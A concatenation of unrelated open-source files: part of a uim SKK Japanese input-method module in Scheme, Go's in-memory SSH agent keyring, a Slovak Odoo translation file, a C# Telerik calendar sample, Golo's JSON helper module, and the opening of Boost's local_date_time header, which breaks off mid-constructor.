(- (skk-context-completion-nth sc) 1)))))
#f))
(define find-kana-list-from-rule
(lambda (rule str)
(if (not (null? rule))
(if (pair? (member str (car (cdr (car rule)))))
(car (cdr (car rule)))
(find-kana-list-from-rule (cdr rule) str))
(list str str str))))
(define skk-string-list-to-context-head
(lambda (sc sl)
(skk-context-set-head! sc '())
(skk-append-string-list-to-context-head sc sl)))
(define skk-append-string-list-to-context-head
(lambda (sc sl)
(let ((append-list-to-context-head
(lambda (sc sl)
(skk-context-set-head! sc (append (skk-context-head sc)
(list sl))))))
(if (not (null? sl))
(begin
(append-list-to-context-head
sc
(if (or
(skk-context-latin-conv sc)
;; handle Setsubi-ji and Settou-ji
(string=? ">" (car sl))
(and
skk-use-numeric-conversion?
(string=? "#" (car sl))))
(list (car sl) (car sl) (car sl))
(find-kana-list-from-rule ja-rk-rule-basic (car sl))))
(skk-append-string-list-to-context-head sc (cdr sl)))
#f))))
(define skk-proc-state-completion
(lambda (c key key-state)
(let ((sc (skk-find-descendant-context c)))
(and
(if (skk-next-completion-key? key key-state)
(skk-change-completion-index sc #t)
#t)
(if (skk-prev-completion-key? key key-state)
(skk-change-completion-index sc #f)
#t)
(if (skk-new-completion-from-current-comp-key? key key-state)
(let* ((comp (skk-get-current-completion sc))
(sl (string-to-list comp)))
(if (not (null? sl))
(begin (skk-lib-get-completion
skk-dic
(skk-get-current-completion sc)
skk-use-numeric-conversion?
skk-use-look?)))
(skk-lib-clear-completions
(skk-make-string
(skk-context-head sc)
skk-type-hiragana)
skk-use-numeric-conversion?)
(if (not (null? sl))
(skk-string-list-to-context-head sc sl))
(skk-context-set-completion-nth! sc 0)
(if skk-dcomp-activate?
(skk-context-set-dcomp-word!
sc
(skk-get-current-completion sc)))
#f)
#t)
(if (skk-cancel-key? key key-state)
(begin
(skk-lib-clear-completions
(skk-make-string (skk-context-head sc) skk-type-hiragana)
skk-use-numeric-conversion?)
(skk-context-set-state! sc 'skk-state-kanji)
;; don't clear dcomp (not compatible with ddskk's behavior)
;;(skk-reset-dcomp-word sc)
#f)
#t)
(let ((sl (string-to-list (skk-get-current-completion sc))))
(skk-lib-clear-completions
(skk-make-string (skk-context-head sc) (skk-context-kana-mode sc))
skk-use-numeric-conversion?)
(if (not (null? sl))
(skk-string-list-to-context-head sc sl))
(skk-reset-dcomp-word sc)
(skk-context-set-state! sc 'skk-state-kanji)
(skk-proc-state-kanji c key key-state)))
#f)))
(define skk-heading-label-char?
(lambda (key)
(cond
((eq? skk-candidate-selection-style 'uim)
(if (member (charcode->string key)
skk-uim-heading-label-char-list)
#t
#f))
((eq? skk-candidate-selection-style 'ddskk-like)
(if (member (charcode->string key)
skk-ddskk-like-heading-label-char-list)
#t
#f)))))
(define skk-proc-state-converting
(lambda (c key key-state)
(let ((sc (skk-find-descendant-context c))
(res #f))
(and
(if (skk-next-candidate-key? key key-state)
(skk-change-candidate-index sc #t)
#t)
(if (skk-prev-candidate-key? key key-state)
(skk-change-candidate-index sc #f)
#t)
(if (skk-cancel-key? key key-state)
(begin
;; back to kanji state
(skk-back-to-kanji-state sc)
#f)
#t)
(if (skk-next-page-key? key key-state)
(begin
(if (skk-context-candidate-window sc)
(im-shift-page-candidate sc #t))
#f)
#t)
(if (skk-prev-page-key? key key-state)
(begin
(if (skk-context-candidate-window sc)
(im-shift-page-candidate sc #f))
#f)
#t)
(if (or
(skk-commit-key? key key-state)
(skk-return-key? key key-state))
(begin
(set! res (skk-prepare-commit-string sc))
(if (skk-return-key? key key-state)
(begin
(skk-commit sc res)
(set! res #f)
(if (not skk-egg-like-newline?)
(if skk-commit-newline-explicitly?
(skk-commit sc "\n")
(begin
(skk-update-preedit sc)
(skk-proc-state-direct c key key-state))))))
#f)
#t)
(if (and skk-commit-candidate-by-label-key?
(skk-heading-label-char? key)
(skk-context-candidate-window sc))
(begin
(set! res (skk-commit-by-label-key sc key))
(if res
#f
#t))
#t)
(if (skk-purge-candidate-key? key key-state)
(if (not
(and (eq? skk-candidate-selection-style 'ddskk-like)
(skk-context-candidate-window sc)))
(begin
(skk-reset-candidate-window sc)
(skk-setup-child-context sc skk-child-type-dialog)
#f))
#t)
(begin
(skk-context-set-state! sc 'skk-state-direct)
(set! res (skk-prepare-commit-string sc))
(skk-commit sc res)
(skk-update-preedit sc)
;; handle Setsubi-ji
(if (skk-special-midashi-key? key key-state)
(begin
(skk-context-set-state! sc 'skk-state-kanji)
(skk-append-string sc '(">" ">" ">"))
(set! res #f))
(set! res (skk-proc-state-direct c key key-state)))))
res)))
(define skk-proc-state-okuri
(lambda (c key key-state)
(let* ((sc (skk-find-descendant-context c))
(rkc (skk-context-rk-context sc))
(res #f))
(and
(if (skk-cancel-key? key key-state)
(begin
(rk-flush rkc)
(skk-back-to-kanji-state sc)
#f)
#t)
(if (skk-backspace-key? key key-state)
(begin
(rk-backspace rkc)
(skk-back-to-kanji-state sc)
#f)
#t)
;; committing incomplete head: conformed the behavior to ddskk
(if (or
(skk-commit-key? key key-state)
(skk-return-key? key key-state))
(begin
(skk-commit sc (skk-make-string
(skk-context-head sc)
(skk-context-kana-mode sc)))
(skk-flush sc)
(if (skk-return-key? key key-state)
(begin
(skk-update-preedit sc)
(skk-proc-state-direct c key key-state)))
#f)
#t)
(begin
(if (string=? (skk-context-okuri-head sc) "")
(if (skk-rk-pending? sc)
(skk-context-set-okuri-head-using-alist!
sc
(car (reverse (rk-context-seq rkc))))
(skk-context-set-okuri-head-using-alist!
sc
(charcode->string (skk-ichar-downcase key)))))
(set! res
(rk-push-key!
rkc
(charcode->string (skk-ichar-downcase key))))
(if (and res
(or
(list? (car res))
(not (string=? (car res) ""))))
(begin
(skk-append-okuri-string sc res)
(if (not (skk-rk-pending? sc))
(skk-begin-conversion sc)))
(begin
(if (= (length (rk-context-seq rkc)) 1)
(skk-context-set-okuri-head-using-alist! sc (charcode->string key)))))))
#f)))
(define skk-proc-state-latin
(lambda (c key key-state)
(let ((sc (skk-find-descendant-context c)))
(if
(skk-on-key? key key-state)
(begin
(skk-context-set-state! sc 'skk-state-direct)
(skk-context-set-kana-mode! sc skk-type-hiragana))
(skk-commit-raw sc key key-state))
#f)))
(define skk-proc-state-wide-latin
(lambda (c key key-state)
(let* ((char (charcode->string key))
(w (if (symbol? key) #f (ja-wide char)))
(sc (skk-find-descendant-context c)))
(if skk-use-with-vi?
(if (skk-vi-escape-key? key key-state)
(skk-context-set-state! sc 'skk-state-latin)))
(cond
((skk-on-key? key key-state)
(skk-flush sc)
(skk-context-set-state! sc 'skk-state-direct)
(skk-context-set-kana-mode! sc skk-type-hiragana))
((and (modifier-key-mask key-state)
(not (shift-key-mask key-state)))
(skk-commit-raw sc key key-state))
(w
(skk-commit sc w))
(else
(skk-commit-raw sc key key-state)))
#f)))
(define skk-proc-state-kcode
(lambda (c key key-state)
(let ((sc (skk-find-descendant-context c)))
(and
(if (skk-cancel-key? key key-state)
(begin
(skk-flush sc)
#f)
#t)
(if (skk-backspace-key? key key-state)
(begin
(if (> (length (skk-context-head sc)) 0)
(skk-context-set-head! sc (cdr (skk-context-head sc)))
(skk-flush sc))
#f)
#t)
(if (or
(skk-commit-key? key key-state)
(skk-return-key? key key-state))
(begin
(if (> (length (skk-context-head sc)) 0)
(let* ((str-list (string-to-list
(skk-make-string
(skk-context-head sc)
(skk-context-kana-mode sc))))
(kanji (ja-kanji-code-input str-list)))
(if (and kanji (> (string-length kanji) 0))
(begin
(skk-commit sc kanji)
(skk-flush sc))))
(skk-flush sc))
#f)
#t)
;; append latin string
(if (ichar-graphic? key)
(let* ((s (charcode->string key))
(p (cons s (cons s (cons s s)))))
(skk-append-string sc p)
#f)
#t))
#f)))
(define skk-push-key
(lambda (c key key-state)
(let* ((sc (skk-find-descendant-context c))
(state (skk-context-state sc))
(fun (cond
((eq? state 'skk-state-direct)
skk-proc-state-direct)
((eq? state 'skk-state-kanji)
skk-proc-state-kanji)
((eq? state 'skk-state-completion)
skk-proc-state-completion)
((eq? state 'skk-state-converting)
skk-proc-state-converting)
((eq? state 'skk-state-okuri)
skk-proc-state-okuri)
((eq? state 'skk-state-latin)
skk-proc-state-latin)
((eq? state 'skk-state-wide-latin)
skk-proc-state-wide-latin)
((eq? state 'skk-state-kcode)
skk-proc-state-kcode)))
(res (fun c key key-state)))
(if res
(skk-commit sc res))
(skk-update-preedit sc))))
(define skk-init-handler
(lambda (id im arg)
(let ((sc (skk-context-new id im)))
(update-style skk-style-spec (symbol-value skk-style))
(set! skk-context-list (cons sc skk-context-list))
sc)))
(define skk-release-handler
(lambda (sc)
(skk-save-personal-dictionary)
(set! skk-context-list (delete! sc skk-context-list))
(if (null? skk-context-list)
(begin
(skk-lib-look-close)
(skk-lib-free-dic skk-dic)
(set! skk-dic #f)))))
(define skk-press-key-handler
(lambda (sc key state)
(if (ichar-control? key)
(im-commit-raw sc)
(skk-push-key sc key state))))
(define skk-release-key-handler
(lambda (c key state)
(let* ((sc (skk-find-descendant-context c))
(state (skk-context-state sc)))
(if (eq? state 'skk-state-latin)
;; don't discard key release event for apps
(begin
(skk-context-set-commit-raw! sc #f)
(im-commit-raw sc))))))
(define skk-reset-handler
(lambda (sc)
(skk-flush sc)))
(define skk-get-candidate-with-okuri
(lambda (cand okuri)
(let ((pos (string-contains cand ";" 0)))
(if pos
(string-append
(substring cand 0 pos)
(skk-make-string okuri skk-type-hiragana)
(substring cand pos (string-length cand)))
(string-append
cand
(skk-make-string okuri skk-type-hiragana))))))
(define skk-get-candidate-handler
(lambda (sc idx accel-enum-hint)
(let* ((dcsc (skk-find-descendant-context sc))
(cand (skk-lib-eval-candidate
(skk-get-nth-candidate
dcsc
(cond
((eq? skk-candidate-selection-style 'uim)
idx)
((eq? skk-candidate-selection-style 'ddskk-like)
(+ idx (- skk-candidate-op-count 1)))))))
(okuri (skk-context-okuri dcsc)))
(list
(if (and
(not (null? okuri))
skk-show-candidates-with-okuri?)
(skk-get-candidate-with-okuri cand okuri)
cand)
(cond
((eq? skk-candidate-selection-style 'uim)
(if (= skk-nr-candidate-max 0)
(digit->string (+ idx 1))
(begin
(set! idx (remainder idx skk-nr-candidate-max))
(if (< idx (length skk-uim-heading-label-char-list))
(charcode->string
(ichar-upcase
(string->charcode
(nth idx skk-uim-heading-label-char-list))))
""))))
((eq? skk-candidate-selection-style 'ddskk-like)
(if (> skk-nr-candidate-max 0)
(set! idx (remainder idx skk-nr-candidate-max)))
(if (< idx (length skk-ddskk-like-heading-label-char-list))
(charcode->string
(ichar-upcase
(string->charcode
(nth idx skk-ddskk-like-heading-label-char-list))))
"")))
""))))
(define skk-set-candidate-index-handler
(lambda (c idx)
(let ((sc (skk-find-descendant-context c)))
(if (skk-context-candidate-window sc)
(begin
(cond
((eq? skk-candidate-selection-style 'uim)
(skk-context-set-nth! sc idx))
((eq? skk-candidate-selection-style 'ddskk-like)
(skk-context-set-nth! sc (+ idx (- skk-candidate-op-count 1)))))
(skk-update-preedit sc))))))
(skk-configure-widgets)
(register-im
'skk
"ja"
"EUC-JP"
skk-im-name-label
skk-im-short-desc
#f
skk-init-handler
skk-release-handler
context-mode-handler
skk-press-key-handler
skk-release-key-handler
skk-reset-handler
skk-get-candidate-handler
skk-set-candidate-index-handler
context-prop-activate-handler
#f
#f
#f
#f
#f
)
| {
"pile_set_name": "Github"
} |
// Copyright 2014 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package agent
import (
"bytes"
"crypto/rand"
"crypto/subtle"
"errors"
"fmt"
"sync"
"time"
"golang.org/x/crypto/ssh"
)
type privKey struct {
signer ssh.Signer
comment string
expire *time.Time
}
type keyring struct {
mu sync.Mutex
keys []privKey
locked bool
passphrase []byte
}
var errLocked = errors.New("agent: locked")
// NewKeyring returns an Agent that holds keys in memory. It is safe
// for concurrent use by multiple goroutines.
func NewKeyring() Agent {
return &keyring{}
}
// RemoveAll removes all identities.
func (r *keyring) RemoveAll() error {
r.mu.Lock()
defer r.mu.Unlock()
if r.locked {
return errLocked
}
r.keys = nil
return nil
}
// removeLocked does the actual key removal. The caller must already be holding the
// keyring mutex.
func (r *keyring) removeLocked(want []byte) error {
found := false
for i := 0; i < len(r.keys); {
if bytes.Equal(r.keys[i].signer.PublicKey().Marshal(), want) {
found = true
r.keys[i] = r.keys[len(r.keys)-1]
r.keys = r.keys[:len(r.keys)-1]
continue
} else {
i++
}
}
if !found {
return errors.New("agent: key not found")
}
return nil
}
// Remove removes all identities with the given public key.
func (r *keyring) Remove(key ssh.PublicKey) error {
r.mu.Lock()
defer r.mu.Unlock()
if r.locked {
return errLocked
}
return r.removeLocked(key.Marshal())
}
// Lock locks the agent. Sign and Remove will fail, and List will return an empty list.
func (r *keyring) Lock(passphrase []byte) error {
r.mu.Lock()
defer r.mu.Unlock()
if r.locked {
return errLocked
}
r.locked = true
r.passphrase = passphrase
return nil
}
// Unlock undoes the effect of Lock
func (r *keyring) Unlock(passphrase []byte) error {
r.mu.Lock()
defer r.mu.Unlock()
if !r.locked {
return errors.New("agent: not locked")
}
if len(passphrase) != len(r.passphrase) || 1 != subtle.ConstantTimeCompare(passphrase, r.passphrase) {
return fmt.Errorf("agent: incorrect passphrase")
}
r.locked = false
r.passphrase = nil
return nil
}
// expireKeysLocked removes expired keys from the keyring. If a key was added
// with a lifetimesecs contraint and seconds >= lifetimesecs seconds have
// ellapsed, it is removed. The caller *must* be holding the keyring mutex.
func (r *keyring) expireKeysLocked() {
for _, k := range r.keys {
if k.expire != nil && time.Now().After(*k.expire) {
r.removeLocked(k.signer.PublicKey().Marshal())
}
}
}
// List returns the identities known to the agent.
func (r *keyring) List() ([]*Key, error) {
r.mu.Lock()
defer r.mu.Unlock()
if r.locked {
// section 2.7: locked agents return empty.
return nil, nil
}
r.expireKeysLocked()
var ids []*Key
for _, k := range r.keys {
pub := k.signer.PublicKey()
ids = append(ids, &Key{
Format: pub.Type(),
Blob: pub.Marshal(),
Comment: k.comment})
}
return ids, nil
}
// Insert adds a private key to the keyring. If a certificate
// is given, that certificate is added as public key. Note that
// any constraints given are ignored.
func (r *keyring) Add(key AddedKey) error {
r.mu.Lock()
defer r.mu.Unlock()
if r.locked {
return errLocked
}
signer, err := ssh.NewSignerFromKey(key.PrivateKey)
if err != nil {
return err
}
if cert := key.Certificate; cert != nil {
signer, err = ssh.NewCertSigner(cert, signer)
if err != nil {
return err
}
}
p := privKey{
signer: signer,
comment: key.Comment,
}
if key.LifetimeSecs > 0 {
t := time.Now().Add(time.Duration(key.LifetimeSecs) * time.Second)
p.expire = &t
}
r.keys = append(r.keys, p)
return nil
}
// Sign returns a signature for the data.
func (r *keyring) Sign(key ssh.PublicKey, data []byte) (*ssh.Signature, error) {
r.mu.Lock()
defer r.mu.Unlock()
if r.locked {
return nil, errLocked
}
r.expireKeysLocked()
wanted := key.Marshal()
for _, k := range r.keys {
if bytes.Equal(k.signer.PublicKey().Marshal(), wanted) {
return k.signer.Sign(rand.Reader, data)
}
}
return nil, errors.New("not found")
}
// Signers returns signers for all the known keys.
func (r *keyring) Signers() ([]ssh.Signer, error) {
r.mu.Lock()
defer r.mu.Unlock()
if r.locked {
return nil, errLocked
}
r.expireKeysLocked()
s := make([]ssh.Signer, 0, len(r.keys))
for _, k := range r.keys {
s = append(s, k.signer)
}
return s, nil
}
| {
"pile_set_name": "Github"
} |
# Translation of Odoo Server.
# This file contains the translation of the following modules:
# * website_customer
#
# Translators:
msgid ""
msgstr ""
"Project-Id-Version: Odoo 8.0\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-01-21 14:08+0000\n"
"PO-Revision-Date: 2016-04-13 09:40+0000\n"
"Last-Translator: Martin Trigaux\n"
"Language-Team: Slovak (http://www.transifex.com/odoo/odoo-8/language/sk/)\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: \n"
"Language: sk\n"
"Plural-Forms: nplurals=3; plural=(n==1) ? 0 : (n>=2 && n<=4) ? 1 : 2;\n"
#. module: website_customer
#: code:addons/website_customer/controllers/main.py:55
#, python-format
msgid "All Countries"
msgstr "Všetky krajiny"
#. module: website_customer
#: view:website:website_customer.implemented_by_block
msgid "Implemented By"
msgstr "Implementoval"
#. module: website_customer
#: view:website:website_customer.index
msgid "No result found"
msgstr "Výsledok nenájedný"
#. module: website_customer
#: view:website:website.layout view:website:website_customer.details
#: view:website:website_customer.index
msgid "Our References"
msgstr "Naše referencie"
#. module: website_customer
#: view:website:website_customer.references_block
msgid "References"
msgstr "Ďalšie zdroje"
#. module: website_customer
#: view:website:website_customer.index
msgid "References by Country"
msgstr "Referencie podľa krajiny"
#. module: website_customer
#: view:website:website_customer.index
msgid "Search"
msgstr "Hľadanie"
#. module: website_customer
#: view:website:website_customer.index
msgid "Trusted by millions worldwide"
msgstr "Preverené miliónmi po celom svete"
#. module: website_customer
#: view:website:website_customer.index
msgid "World Map"
msgstr "Mapa sveta"
#. module: website_customer
#: view:website:website_customer.implemented_by_block
msgid "reference(s))"
msgstr "referencia(e)"
| {
"pile_set_name": "Github"
} |
using System;
using System.Collections.Generic;
using Android.Views;
using Android.OS;
using Com.Telerik.Widget.Calendar;
using Android.Content;
using Android.Widget;
using Com.Telerik.Widget.Calendar.Events;
using Java.Util;
namespace Samples
{
public class EventAllDayFragment : Android.Support.V4.App.Fragment, ExampleFragment
{
public override View OnCreateView (LayoutInflater inflater, ViewGroup container, Bundle savedInstanceState)
{
RadCalendarView calendarView = new RadCalendarView (Activity);
Calendar calendar = Java.Util.Calendar.Instance;
long start = calendar.TimeInMillis;
calendar.Add (CalendarField.Hour, 3);
long end = calendar.TimeInMillis;
Event allDayEvent = new Event ("Enjoy Life", start, end);
allDayEvent.AllDay = true;
IList<Event> events = new List<Event> ();
events.Add (allDayEvent);
calendarView.EventAdapter.Events = events;
return calendarView;
}
public String Title() {
return "All day event";
}
}
} | {
"pile_set_name": "Github"
} |
# ............................................................................................... #
#
# Copyright (c) 2012-2020 Institut National des Sciences Appliquées de Lyon (INSA Lyon) and others
#
# This program and the accompanying materials are made available under the
# terms of the Eclipse Public License 2.0 which is available at
# http://www.eclipse.org/legal/epl-2.0.
#
# SPDX-License-Identifier: EPL-2.0
#
# ............................................................................................... #
----
A set of useful APIs for dealing with JSON documents from Golo.
The implementation is backed by [json-simple](https://code.google.com/p/json-simple/). While
`json-simple` only supports encoding from lists and maps, this API brings support for sets, arrays,
Golo tuples, dynamic objects and structs.
----
module gololang.JSON
# ............................................................................................... #
----
Takes any know object, and gives a JSON string representation:
let data = map[
["name", "Somebody"],
["age", 69],
["friends", list[
"Mr Bean", "John B", "Larry"
]]
]
let asText = JSON.stringify(data)
`obj` may be a list, an array, a set, a map, a tuple, a dynamic object or a struct. If `obj` is from
another type then its string representation is given according to `obj: toString()` or `"null"` if
`obj` is `null`.
----
function stringify = |obj| {
let res = stringify_walk(obj)
if (res is null) {
return "null"
} else {
return res: toString()
}
}
local function isSeq = |obj| ->
(obj oftype java.util.List.class) or
(obj oftype java.util.Set.class) or
(obj oftype gololang.Tuple.class) or
(isArray(obj))
local function stringify_walk = |obj| {
if obj oftype java.util.Map.class {
let json = org.json.simple.JSONObject()
foreach key in obj: keySet() {
json: put(key, stringify_walk(obj: get(key)))
}
return json
} else if isSeq(obj) {
let json = org.json.simple.JSONArray()
foreach value in obj {
json: add(stringify_walk(value))
}
return json
} else if obj oftype gololang.DynamicObject.class {
let json = org.json.simple.JSONObject()
foreach prop in obj: properties() {
let value = prop: getValue()
if not(isClosure(value)) {
json: put(prop: getKey(), stringify_walk(value))
}
}
return json
} else if (obj oftype gololang.GoloStruct.class) {
let json = org.json.simple.JSONObject()
foreach member in obj: members() {
json: put(member, stringify_walk(obj: get(member)))
}
return json
}
return obj
}
----
Parses a JSON string and gives an object representation as a list or map collection:
let data = JSON.parse(text)
println(data: get("name"))
----
function parse = |str| -> org.json.simple.JSONValue.parseWithException(str)
# ............................................................................................... #
----
Provides a mixin for dynamic objects that includes a `toJSON()` method:
object: mixin(JSON.dynamicObjectMixin()): toJSON()
which is equivalent to:
JSON.stringify(object)
----
function dynamicObjectMixin = ->
DynamicObject(): define("toJSON", |this| -> stringify(this))
----
Returns a new dynamic object from a JSON string where each first-level entry is mapped into the
dynamic object:
let obj = JSON.toDynamicObject(JSON.stringify(map[
["a", "1"], ["b", "2"]
]))
println(obj: a())
println(obj: b())
----
function toDynamicObject = |str| {
let obj = DynamicObject()
let map = parse(str)
foreach key in map: keySet() {
obj: define(key, map: get(key))
}
return obj
}
----
Returns a new dynamic object from a JSONObject where each level entry is mapped into the
dynamic object or an array of dynamic objects.
----
local function toDynamicObjectFromJSONObject = |obj| {
let isJSONObject = |obj| -> obj oftype org.json.simple.JSONObject.class
let isJSONArray = |obj| -> obj oftype org.json.simple.JSONArray.class
let parse_object = |level, obj, dyno| {
let parseMembers = |obj, dyno| {
obj: each(|key, value| {
dyno: define(key, value)
parse_object(key, value, dyno)
})
}
if isJSONObject(obj) {
if level is null { # root
parseMembers(obj, dyno)
} else {
dyno: define(level, DynamicObject())
parseMembers(obj, dyno: get(level))
}
} else if isJSONArray(obj) {
dyno: define(level, list[])
obj: each(|item| {
if isJSONObject(item) is false and isJSONArray(item) is false {
dyno: get(level): append(item)
} else if isJSONObject(item) {
let subDyno = DynamicObject()
parseMembers(item, subDyno)
dyno: get(level): append(subDyno)
}
})
}
return dyno
}
return parse_object(null, obj, DynamicObject())
}
----
Returns a list of dynamic objects from a JSONArray where each level entry is mapped into the
dynamic object or an array of dynamic objects.
----
local function toDynamicObjectsListFromJSONArray = |arr| -> arr: map(|obj| -> toDynamicObjectFromJSONObject(obj))
----
Returns a new dynamic object from a JSON string where each level entry is mapped into the
dynamic object or an array of dynamic objects:
let obj = JSON.toDynamicObjectFromJSONString("""
{
"id":"bob",
"friends":[
{"name":"sam"}, {"name":"jane"}, {"name":"john"}
],
"address": {
"street":"20 Avenue Albert Einstein",
"city":"Villeurbanne",
"zip":"69100",
"country":"France"
}
}
""")
obj: friends(): get(2): name(): equals("john") # true
obj: address(): city(): equals("Villeurbanne") # true
----
function toDynamicObjectFromJSONString = |str| -> toDynamicObjectFromJSONObject(parse(str))
----
Returns a list of dynamic objects from a JSON string where each level entry is mapped into the
dynamic object or an array of dynamic objects:
let objects = JSON.toDynamicObjectsListFromJSONString("""[
{"message":"hello"},
{
"id":"bob",
"friends":[
{"name":"sam"}, {"name":"jane"}, {"name":"john"}
],
"address": {
"street":"20 Avenue Albert Einstein",
"city":"Villeurbanne",
"zip":"69100",
"country":"France"
}
}
]""")
println(objects: get(1): friends(): get(2): name(): equals("john")) # true
println(objects: get(1): address(): city(): equals("Villeurbanne")) # true
----
function toDynamicObjectsListFromJSONString = |str| -> toDynamicObjectsListFromJSONArray(parse(str))
----
Returns a new dynamic object from a map where each level entry is mapped into the
dynamic object or an array of dynamic objects:
let obj = JSON.toDynamicObjectFromMap(map[
["id", "bob"],
["friends", [
map[["name", "sam"]],
map[["name", "jane"]],
map[["name", "john"]]
]],
["address", map[
["street", "20 Avenue Albert Einstein"],
["city", "Villeurbanne"],
["zip", "69100"],
["country", "France"]
]]
])
println(obj: friends(): get(2): name(): equals("john")) # true
println(obj: address(): city(): equals("Villeurbanne")) # true
----
function toDynamicObjectFromMap = |mapInstance| -> toDynamicObjectFromJSONObject(parse(stringify(mapInstance)))
----
Returns a list of dynamic objects from a collection of maps where each level entry is mapped into the
dynamic object or an array of dynamic objects:
let objects = JSON.toDynamicObjectsListFromMapsCollection([
map[["message", "hello"]],
map[
["id", "bob"],
["friends", list[
map[["name", "sam"]],
map[["name", "jane"]],
map[["name", "john"]]
]],
["address", map[
["street", "20 Avenue Albert Einstein"],
["city", "Villeurbanne"],
["zip", "69100"],
["country", "France"]
]]
]
])
println(objects: get(1): friends(): get(2): name(): equals("john")) # true
println(objects: get(1): address(): city(): equals("Villeurbanne")) # true
----
function toDynamicObjectsListFromMapsCollection = |mapInstance| -> toDynamicObjectsListFromJSONArray(parse(stringify(mapInstance)))
# ............................................................................................... #
----
JSON augmentations for structs.
----
augment gololang.GoloStruct {
----
Conveniently adds a `toJSON()` method, which is equivalent to calling `JSON.stringify()`:
struct Person = { name, age, email }
# (...)
Person("Mr Bean", "[email protected]", 64): toJSON()
----
function toJSON = |this| -> stringify(this)
----
Populates the elements of a struct based on the values found in a JSON string.
let str = JSON.stringify(map[
["name", "Foo"],
["email", "[email protected]"],
["age", 99],
["gender", "N/A"]
])
let foo = Person(): updateFromJSON(str)
Note that missing entries from the JSON data yield `null` values in the struct.
----
function updateFromJSON = |this, str| {
let map = parse(str)
foreach member in this: members() {
this: set(member, map: get(member))
}
return this
}
}
# ............................................................................................... #
| {
"pile_set_name": "Github"
} |
#ifndef LOCAL_TIME_LOCAL_DATE_TIME_HPP__
#define LOCAL_TIME_LOCAL_DATE_TIME_HPP__
/* Copyright (c) 2003-2005 CrystalClear Software, Inc.
* Subject to the Boost Software License, Version 1.0.
* (See accompanying file LICENSE_1_0.txt or http://www.boost.org/LICENSE_1_0.txt)
* Author: Jeff Garland, Bart Garst
* $Date$
*/
#include <string>
#include <iomanip>
#include <sstream>
#include <stdexcept>
#include <boost/shared_ptr.hpp>
#include <boost/throw_exception.hpp>
#include <boost/date_time/time.hpp>
#include <boost/date_time/posix_time/posix_time.hpp> //todo remove?
#include <boost/date_time/compiler_config.hpp>
#include <boost/date_time/dst_rules.hpp>
#include <boost/date_time/time_zone_base.hpp>
#include <boost/date_time/special_defs.hpp>
#include <boost/date_time/time_resolution_traits.hpp> // absolute_value
namespace boost {
namespace local_time {
//! simple exception for reporting when STD or DST cannot be determined
struct BOOST_SYMBOL_VISIBLE ambiguous_result : public std::logic_error
{
ambiguous_result (std::string const& msg = std::string()) :
std::logic_error(std::string("Daylight Savings Results are ambiguous: " + msg)) {}
};
//! simple exception for when time label given cannot exist
struct BOOST_SYMBOL_VISIBLE time_label_invalid : public std::logic_error
{
time_label_invalid (std::string const& msg = std::string()) :
std::logic_error(std::string("Time label given is invalid: " + msg)) {}
};
struct BOOST_SYMBOL_VISIBLE dst_not_valid: public std::logic_error
{
dst_not_valid(std::string const& msg = std::string()) :
std::logic_error(std::string("is_dst flag does not match resulting dst for time label given: " + msg)) {}
};
//TODO: I think these should be in local_date_time_base and not
// necessarily brought into the namespace
using date_time::time_is_dst_result;
using date_time::is_in_dst;
using date_time::is_not_in_dst;
using date_time::ambiguous;
using date_time::invalid_time_label;
//! Representation of "wall-clock" time in a particular time zone
/*! Representation of "wall-clock" time in a particular time zone
* Local_date_time_base holds a time value (date and time offset from 00:00)
* along with a time zone. The time value is stored as UTC and conversions
* to wall clock time are made as needed. This approach allows for
* operations between wall-clock times in different time zones, and
* daylight savings time considerations, to be made. Time zones are
* required to be in the form of a boost::shared_ptr<time_zone_base>.
*/
template<class utc_time_=posix_time::ptime,
class tz_type=date_time::time_zone_base<utc_time_,char> >
class BOOST_SYMBOL_VISIBLE local_date_time_base : public date_time::base_time<utc_time_,
boost::posix_time::posix_time_system> {
public:
typedef utc_time_ utc_time_type;
typedef typename utc_time_type::time_duration_type time_duration_type;
typedef typename utc_time_type::date_type date_type;
typedef typename date_type::duration_type date_duration_type;
typedef typename utc_time_type::time_system_type time_system_type;
/*! This constructor interprets the passed time as a UTC time.
* So, for example, if the passed timezone is UTC-5 then the
* time will be adjusted back 5 hours. The time zone allows for
* automatic calculation of whether the particular time is adjusted for
* daylight savings, etc.
* If the time zone shared pointer is null then time stays unadjusted.
*@param t A UTC time
*@param tz Timezone for to adjust the UTC time to.
*/
local_date_time_base(utc_time_type t,
boost::shared_ptr<tz_type> tz) :
date_time::base_time<utc_time_type, time_system_type>(t),
zone_(tz)
{
// param was already utc so nothing more to do
}
/*! This constructs a local time -- the passed time information
* understood to be in the passed tz. The DST flag must be passed
* to indicate whether the time is in daylight savings or not.
* @throws -- time_label_invalid if the time passed does not exist in
* the given locale. The non-existent case occurs typically
* during the shift-back from daylight savings time. When
* the clock is shifted forward a range of times
* (2 am to 3 am in the US) is skipped and hence is invalid.
* @throws -- dst_not_valid if the DST flag is passed for a period
* where DST is not active.
*/
local_date_time_base(date_type d,
time_duration_type td,
boost::shared_ptr<tz_type> tz,
bool dst_flag) : //necessary for constr_adj()
date_time::base_time<utc_time_type,time_system_type>(construction_adjustment(utc_time_type(d, td), tz, dst_flag)),
zone_(tz)
{
if(tz != boost::shared_ptr<tz_type>() && tz->has_dst()){
// d & td are already local so we use them
time_is_dst_result result = check_dst(d, td, tz);
bool in_dst = (result == is_in_dst); // less processing than is_dst()
// ambig occurs at end, invalid at start
if(result == invalid_time_label){
// Ex: 2:15am local on trans-in day in nyc, dst_flag irrelevant
std::ostringstream ss;
ss << "time given: " << d << ' ' << td;
boost::throw_exception(time_label_invalid(ss.str()));
}
else if(result != ambiguous && in_dst != dst_flag){
// is dst_flag accurate?
// Ex: false flag in NYC in June
std::ostringstream ss;
ss.setf(std::ios_base::boolalpha);
ss << "flag given: dst=" << dst_flag << ", dst calculated: dst=" << in_dst;
boost::throw_exception(dst_not_valid(ss.str()));
}
// everything checks out and conversion to utc already done
}
}
//TODO maybe not the right set...Ignore the last 2 for now...
enum DST_CALC_OPTIONS { EXCEPTION_ON_ERROR, NOT_DATE_TIME_ON_ERROR };
//ASSUME_DST_ON_ERROR, ASSUME_NOT_DST_ON_ERROR };
/*! This constructs a local time -- the passed time information
* understood to be in the passed tz. The DST flag is calculated
* according to the specified rule.
*/
local_date_time_base(date_type d,
time_duration_type td,
boost::shared_ptr<tz_type> tz,
DST_CALC_OPTIONS calc_option) :
// dummy value - time_ is set in constructor code
